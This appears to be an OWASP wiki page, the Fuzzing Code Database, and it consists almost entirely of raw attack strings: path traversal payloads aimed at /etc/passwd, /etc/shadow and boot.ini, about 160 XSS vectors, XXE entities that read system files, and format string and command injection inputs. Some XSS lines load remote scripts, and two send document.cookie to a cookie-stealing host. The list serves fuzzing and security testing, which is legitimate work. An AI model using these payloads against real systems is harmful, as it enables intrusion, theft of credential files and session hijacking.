../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
%0a/bin/cat%20/etc/passwd
%0a/bin/cat%20/etc/shadow
%00/etc/passwd%00
%00/etc/shadow%00
%00../../../../../../etc/passwd
%00../../../../../../etc/shadow
/../../../../../../../../../../../etc/passwd%00.jpg
/../../../../../../../../../../../etc/passwd%00.html
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
\\&apos;/bin/cat%20/etc/passwd\\&apos;
\\&apos;/bin/cat%20/etc/shadow\\&apos;
../../../../../../../../conf/server.xml
/../../../../../../../../bin/id|
C:/inetpub/wwwroot/global.asa
C:\inetpub\wwwroot\global.asa
C:/boot.ini
C:\boot.ini
../../../../../../../../../../../../localstart.asp%00
../../../../../../../../../../../../localstart.asp
../../../../../../../../../../../../boot.ini%00
../../../../../../../../../../../../boot.ini
/./././././././././././boot.ini
/../../../../../../../../../../../boot.ini%00
/../../../../../../../../../../../boot.ini
/..\../..\../..\../..\../..\../..\../boot.ini
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
\..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini
/../../../../../../../../../../../boot.ini%00.html
/../../../../../../../../../../../boot.ini%00.jpg
/.../.../.../.../.../
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini

Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".

XSS Statements - Most effective/most common statements

Testing Statements

';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
'';!--"<XSS>=&{()}

Common exploit code (covers a lot of XSS vulnerabilities)

'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt='
"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt="
\'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><img src="" alt=\'
'); alert('xss'); var x='
\\'); alert(\'xss\');var x=\'
//--></SCRIPT><SCRIPT>alert(String.fromCharCode(88,83,83));

=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162)

Statements
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
"<IMG SRC=""javascript:alert('XSS');"">"
<IMG SRC=JaVaScRiPt:alert('XSS')>
"<IMG SRC=javascript:alert(""XSS"")>"
"<IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`>"
"<IMG """"""><SCRIPT>alert(""XSS"")</SCRIPT>"">"
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
"<IMG SRC=""jav"
"ascript:alert('XSS');"">"
"perl -e 'print ""<IMG SRC=java\0script:alert(\""XSS\"")>"";' > out"
"perl -e 'print ""<SCR\0IPT>alert(\""XSS\"")</SCR\0IPT>"";' > out"
"<IMG SRC="" &#14;  javascript:alert('XSS');"">"
"<SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(""XSS"")>"
"<SCRIPT/SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<<SCRIPT>alert(""XSS"");//<</SCRIPT>"
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<SCRIPT SRC=//ha.ckers.org/.j>
"<IMG SRC=""javascript:alert('XSS')"""
<iframe src=http://ha.ckers.org/scriptlet.html <
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT>
"\"";alert('XSS');//"
"</TITLE><SCRIPT>alert(""XSS"");</SCRIPT>"
"<INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');"">"
"<BODY BACKGROUND=""javascript:alert('XSS')"">"
<BODY ONLOAD=alert('XSS')>
"<IMG DYNSRC=""javascript:alert('XSS')"">"
"<IMG LOWSRC=""javascript:alert('XSS')"">"
"<BGSOUND SRC=""javascript:alert('XSS');"">"
"<BR SIZE=""&{alert('XSS')}"">"
"<LAYER SRC=""http://ha.ckers.org/scriptlet.html""></LAYER>"
"<LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');"">"
"<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css"">"
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
"<META HTTP-EQUIV=""Link"" Content=""<http://ha.ckers.org/xss.css>; REL=stylesheet"">"
"<STYLE>BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}</STYLE>"
"<XSS STYLE=""behavior: url(xss.htc);"">"
"<STYLE>li {list-style-image: url(""javascript:alert('XSS')"");}</STYLE><UL><LI>XSS"
"<IMG SRC='vbscript:msgbox(""XSS"")'>"
¼script¾alert(¢XSS¢)¼/script¾
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"">"
"<META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');"">"
"<IFRAME SRC=""javascript:alert('XSS');""></IFRAME>"
"<FRAMESET><FRAME SRC=""javascript:alert('XSS');""></FRAMESET>"
"<TABLE BACKGROUND=""javascript:alert('XSS')"">"
"<TABLE><TD BACKGROUND=""javascript:alert('XSS')"">"
"<DIV STYLE=""background-image: url(javascript:alert('XSS'))"">"
"<DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"">"
"<DIV STYLE=""background-image: url(&#1;javascript:alert('XSS'))"">"
"<DIV STYLE=""width: expression(alert('XSS'));"">"
"<STYLE>@im\port'\ja\vasc\ript:alert(""XSS"")';</STYLE>"
"<IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))"">"
"<XSS STYLE=""xss:expression(alert('XSS'))"">"
"exp/*<A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'>"
"<STYLE TYPE=""text/javascript"">alert('XSS');</STYLE>"
"<STYLE>.XSS{background-image:url(""javascript:alert('XSS')"");}</STYLE><A CLASS=XSS></A>"
"<STYLE type=""text/css"">BODY{background:url(""javascript:alert('XSS')"")}</STYLE>"
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
"<BASE HREF=""javascript:alert('XSS');//"">"
"<OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""></OBJECT>"
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
"<EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""></EMBED>"
"<EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""></EMBED>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
"<XML ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<XML ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></XML><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN>"
"<XML SRC=""xsstest.xml"" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML><BODY><?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""><?import namespace=""t"" implementation=""#default#time2""><t:set attributeName=""innerHTML"" to=""XSS<SCRIPT DEFER>alert(""XSS"")</SCRIPT>""></BODY></HTML>"
"<SCRIPT SRC=""http://ha.ckers.org/xss.jpg""></SCRIPT>"
"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'""-->"
"<? echo('<SCR)';echo('IPT>alert(""XSS"")</SCRIPT>'); ?>"
"<META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=<SCRIPT>alert('XSS')</SCRIPT>"">"
"<HEAD><META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
"<SCRIPT a="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ="">"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">"" '' SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT ""a='>'"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a=`>` SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT a="">'>"" SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<SCRIPT>document.write(""<SCRI"");</SCRIPT>PT SRC=""http://ha.ckers.org/xss.js""></SCRIPT>"
"<A HREF=""http://66.102.7.147/"">XSS</A>"
"<A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D"">XSS</A>"
"<A HREF=""http://1113982867/"">XSS</A>"
"<A HREF=""http://0x42.0x0000066.0x7.0x93/"">XSS</A>"
"<A HREF=""http://0102.0146.0007.00000223/"">XSS</A>"
"<A HREF=""h\ntt\tp://6"
"<A HREF=""//www.google.com/"">XSS</A>"
"<A HREF=""//google"">XSS</A>"
"<A HREF=""http://google.com/"">XSS</A>"
"<A HREF=""http://www.google.com./"">XSS</A>"
"<A HREF=""javascript:document.location='http://www.google.com/'"">XSS</A>"
"<A HREF=""http://www.gohttp://www.google.com/ogle.com/"">XSS</A>"
"<div onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<bgsound src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&{document.write(""XSS-XSS-XSS"");};"
"<img src=&{document.write(""XSS-XSS-XSS"");};>"
"<link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<iframe src=""vbscript:document.write(""XSS-XSS-XSS"");"">"
"<img src=""livescript:document.write(""XSS-XSS-XSS"");"">"
"<a href=""about:<script>document.write(""XSS-XSS-XSS"");</script>"">"
"<meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");"">"
"<body onload=""document.write(""XSS-XSS-XSS"");"">"
"<div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););"">"
"<div style=""behaviour: url([link to code]);"">"
"<div style=""binding: url([link to code]);"">"
"<div style=""width: expression(document.write(""XSS-XSS-XSS""););"">"
"<style type=""text/javascript"">document.write(""XSS-XSS-XSS"");</style>"
"<object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<style><!--</style><script>document.write(""XSS-XSS-XSS"");//--></script>"
"<![CDATA[<!--]]><script>document.write(""XSS-XSS-XSS"");//--></script>"
"<<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<img src=""blah>"" onmouseover=""document.write(""XSS-XSS-XSS"");"">"
"<div datafld=""b"" dataformatas=""html"" datasrc=""#X""></div>"
"<a href=""javascript#document.write(""XSS-XSS-XSS"");"">"
"<img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");"">"
"&<script>document.write(""XSS-XSS-XSS"");</script>"
"<img src=""mocha:document.write(""XSS-XSS-XSS"");"">"
"<div style=""binding: url([link to code]);""> [Mozilla]"
"<!-- -- --><script>document.write(""XSS-XSS-XSS"");</script><!-- -- -->"
"<xml src=""javascript:document.write(""XSS-XSS-XSS"");"">"
"<xml id=""X""><a><b><script>document.write(""XSS-XSS-XSS"");</script>;</b></a></xml>"
"[\xC0][\xBC]script>document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script>"
><script>
"<script>alert(""WXSS"")</script>"
"<<script>alert(""WXSS"");//<</script>"
<script>alert(document.cookie)</script>
'><script>alert(document.cookie)</script>
'><script>alert(document.cookie);</script>
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
&ltscript&gtalert(document.cookie);</script>
&ltscript&gtalert(document.cookie);&ltscript&gtalert
<xss><script>alert('WXSS')</script></vulnerable>
<IMG%20SRC='javascript:alert(document.cookie)'>
"<IMG%20SRC=""javascript:alert('WXSS');"">"
"<IMG%20SRC=""javascript:alert('WXSS')"""
<IMG%20SRC=JaVaScRiPt:alert('WXSS')>
<IMG%20SRC=javascript:alert("WXSS")>
"<IMG%20SRC=`javascript:alert(""'WXSS'"")`>"
"<IMG%20""""""><SCRIPT>alert(""WXSS"")</SCRIPT>"">"
<IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG%20SRC='javasc
"<IMG%20SRC=""jav"
"<IMG%20SRC=""jav	ascript:alert('WXSS');"">"
"<IMG%20SRC=""jav
ascript:alert('WXSS');"">"
"<IMG%20SRC=""jav
ascript:alert('WXSS');"">"
"<IMG%20SRC=""%20&#14;%20javascript:alert('WXSS');"">"
"<IMG%20DYNSRC=""javascript:alert('WXSS')"">"
"<IMG%20LOWSRC=""javascript:alert('WXSS')"">"
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
<IMG%20SRC=javascript:alert('XSS')>
<IMG%20SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG%20SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
"><script>document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie</script>
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
'';!--<XSS>=&{()}"


XML Attacks - (Update: 11 August 2009 - Total Statements: 15)

Statements
count(/child::node())
x' or name()='username' or 'x'='y
<name>','')); phpinfo(); exit;/*</name>
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"

Format String Statements - (Update: xx/xx/xx - Total Statements: 28)

%s%p%x%d
.1024d
%.2049d
%p%p%p%p
%x%x%x%x
%d%d%d%d
%s%s%s%s
%99999999999s
%08x
%%20d
%%20n
%%20x
%%20s
%s%s%s%s%s%s%s%s%s%s
%p%p%p%p%p%p%p%p%p%p
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
f(x)=%s x 123
f(x)=%x x 255
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
XXXXX.%p
XXXXX`perl -e 'print ".%p" x 80'`
`perl -e 'print ".%p" x 80'`%n
%08x.%08x.%08x.%08x.%08x\n
XXX0_%08x.%08x.%08x.%08x.%08x\n
%.16705u%2\$hn
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;

Project Contributor

Project Leader: Wagner Elias

Reviewer: Eduardo Neves

Contributor: Ulisses Castro

Feedback and Participation

We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org

Project Identification

PROJECT INFO
What does this OWASP project offer you?
what is this project?
OWASP Fuzzing Code Database

Purpose: N/A

License: N/A

who is working on this project?
Project Leader: Wagner Elias

Project Maintainer:

Project Contributor(s): N/A

how can you learn more?
Project Pamphlet: N/A

3x slide Project Presentation: N/A

Mailing list: Subscribe or read the archives

Project Roadmap: N/A

Main links: N/A

Project Health: Yellow button.JPG Not Reviewed (Provisional)
To be reviewed under Assessment Criteria v2.0

Key Contacts
  • Contact Wagner Elias to contribute, review or sponsor this project
  • Contact the GPC to report a problem or concern about this project or to update information.

This category currently contains no pages or media.